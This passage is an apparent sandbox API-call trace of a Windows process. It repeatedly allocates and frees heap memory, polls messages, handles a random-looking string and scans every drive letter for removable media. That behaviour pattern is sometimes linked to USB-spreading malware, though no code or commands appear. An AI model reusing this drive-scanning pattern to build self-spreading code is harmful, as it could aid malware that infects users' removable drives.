[0220.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0220.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326020 [0220.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0220.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0220.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326020 | out: hHeap=0x12c0000) returned 1 [0220.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0220.797] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 | out: hHeap=0x12c0000) returned 1 [0220.797] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0220.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0220.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0220.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.798] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0220.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0220.798] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0220.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.798] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0220.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.798] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0220.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0220.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0220.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0220.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0220.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0220.799] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.799] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.799] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.799] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.799] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.799] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.800] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.800] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.800] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.800] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.800] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.801] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.801] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.801] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.801] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.801] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.802] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.802] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.802] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.802] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.802] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.803] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.803] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.803] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0220.803] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.803] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.803] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.804] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0220.804] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.804] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0220.804] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.804] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.804] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0220.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0220.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0220.804] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.804] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0220.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0220.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0220.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e60 [0220.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0220.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0220.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0220.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e60 | out: hHeap=0x12c0000) returned 1 [0220.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0220.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0220.805] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0220.805] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0220.805] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0220.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0220.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.806] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.806] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.806] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0220.806] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.806] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.806] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0220.806] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.806] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.806] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.806] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0220.806] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0220.806] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.806] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.806] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0220.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0220.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0220.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0220.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0220.807] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.807] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.807] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.808] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.808] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.808] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.808] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.808] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.808] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.809] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.809] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.809] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.809] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.809] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.810] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.810] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.810] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.810] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.810] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.811] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.811] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.811] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.811] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.811] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0220.811] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.812] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.812] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0220.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0220.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0220.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0220.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.813] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0220.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0220.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0220.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326120 [0220.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.813] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326120 | out: hHeap=0x12c0000) returned 1 [0220.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0220.813] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0220.813] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0220.814] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.814] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.814] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0220.814] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.814] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0220.814] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.814] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0220.814] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0220.814] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0220.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.814] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.814] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.814] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0220.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0220.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.814] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0220.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0220.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0220.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.814] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.815] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0220.815] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0220.815] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0220.815] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.815] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.815] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.815] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.815] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.815] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.815] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.816] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.816] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.816] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.816] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.818] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.818] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.819] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.819] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.819] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.819] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.819] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.819] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.820] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.820] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.820] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.820] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.820] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0220.820] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.821] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.821] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.821] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0220.821] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0220.821] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.821] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.821] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.821] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0220.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0220.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.821] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.821] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 